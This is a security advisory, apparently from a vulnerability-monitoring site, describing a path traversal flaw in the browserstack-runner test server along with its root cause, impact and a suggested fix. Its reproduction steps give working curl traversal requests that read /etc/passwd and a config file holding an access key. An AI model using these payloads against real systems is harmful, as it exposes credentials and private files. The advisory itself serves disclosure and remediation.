Know every vulnerabilitybefore it knows you.
DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.
GHSA-8rpw-6cqh-2v9h
browserstack-runnerSummary
The HTTP server in browserstack-runner serves files from the project directory via the _default handler. This handler uses path.join(process.cwd(), uri) to resolve file paths but does not validate that the resulting path stays within the project root. Combined with the server binding on 0.0.0.0 (all interfaces) and the absence of any authentication, this allows an unauthenticated network-adjacent attacker to read arbitrary files from the host filesystem.
Root Cause
lib/server.js, lines 530–534 : _default handler:
'_default': function defaultHandler(uri, body, request, response) {
var filePath = path.join(process.cwd(), uri);
handleFile(filePath, request, response);
}
uri comes from url.parse(request.url).pathname (line 540), which preserves ../ sequences. path.join resolves them, producing absolute paths outside the project directory. No boundary check is performed before serving the file.
bin/cli.js, line 131 : server binding:
server.listen(parseInt(config.test_server_port, 10));
No hostname is specified, so Node.js binds on 0.0.0.0 (all interfaces).
No authentication: The _default handler does not call getWorkerUuid() or perform any authentication check.
Steps to Reproduce
Step 1 : Start the server (Terminal 1)
cd browserstack-runner
echo '<html><body>test</body></html>' > _poc_test.html
echo '{"username":"X","key":"X","test_path":"_poc_test.html","test_framework":"qunit","browsers":[]}' > browserstack.json
node bin/runner.js
Step 2 : Read arbitrary files (Terminal 2)
Read /etc/hostname:
curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/hostname"
Read /etc/passwd:
curl -s --path-as-is "http://127.0.0.1:8888/../../../etc/passwd"
Read the BrowserStack access key from config:
curl -s "http://127.0.0.1:8888/browserstack.json"
Note:
--path-as-isis required because curl normalizes../sequences by default. Browsers and HTTP libraries that do not normalize URL paths (or that allow raw path construction) can exploit this without special flags.
Expected Result
/etc/hostname→ server returns the machine hostname/etc/passwd→ server returns the full passwd filebrowserstack.json→ server returns the config including the BrowserStack access key
Impact
- BrowserStack access key theft :
browserstack.jsonis always in the project root (same directory the server serves from), and containsusernameandkeyin cleartext - Source code theft : all project files are readable
- System file disclosure :
/etc/passwd,/etc/shadow(if readable), SSH keys,.envfiles,.npmrc(npm tokens), etc. - Chainable with Finding #1 : same server, same exposure window, same network-adjacent attacker
Suggested Fix
- Validate the resolved path stays within the project root:
var filePath = path.resolve(process.cwd(), '.' + uri);
if (!filePath.startsWith(process.cwd() + path.sep)) {
sendError(response, 'Forbidden', 403);
return;
}
- Bind on
127.0.0.1 - Add authentication to the
_defaulthandler
The vulnerability can be exploited over a local network, such as Wi-Fi. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a high impact on the confidentiality of the information.
Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.
Probability that this vulnerability will be exploited in the wild within the next 30 days.
We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.
Browse More
Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.
Checkout DevGuard